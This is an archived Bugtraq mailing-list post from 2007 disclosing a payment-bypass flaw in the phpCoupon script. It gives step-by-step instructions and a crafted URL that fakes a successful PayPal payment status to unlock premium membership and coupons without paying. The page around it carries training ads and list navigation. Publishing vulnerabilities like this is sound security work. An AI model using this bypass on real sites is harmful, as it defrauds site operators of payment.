Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

phpCoupon Vulnerabilities

from [hack2prison] Network Security [Permanent Link]
Subject: phpCoupon Vulnerabilities
Date: 28 Jul 2007 05:18:04 -0000 
Discovered by freeprotect.net member
Vendor site: http://phpcoupon.com
====================================
phpCoupon is Developed to provide an affordable and easy to operate local 
coupon websites for local and niche directory owners and entrepreneurs seeking 
income opportunites.
It has a security hole. Please show how to exploit following:
1. Click "Business Owners" and register account.
2. Login and show:
-------------------------------------------------
Membership Expiration:  00-00-0000
Maximum Coupons:        0       Coupons Used:   0       Coupons Available:      0
-------------------------------------------------
Meaning you aren't Premium Member.
3. Click "Billing Control Panel"
Click "Buy now" will redirect to paypal.com
OK, now copy this link 
http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX
 and paste override paypal link.
Note: =upgradeX ---> X is number of coupon you need. Example: 
http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5
OK now relogin you account you see:
-------------------------------------------------
Membership Expiration:  07-28-2007
Maximum Coupons:        0       Coupons Used:   0       Coupons Available:      0
-------------------------------------------------
You are Premium Member!!!!
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • phpCoupon Vulnerabilities, hack2prison <=
Previous by Date:  PHPBlogger cookie privilege escalation, darthballsbr
Next by Date:  TSLSA-2007-0023 - multi, Trustix Security Advisor
Previous by Thread:  PHPBlogger cookie privilege escalation, darthballsbr
Next by Thread:  TSLSA-2007-0023 - multi, Trustix Security Advisor
Indexes:  [Date] [Thread] [Top] [All Lists]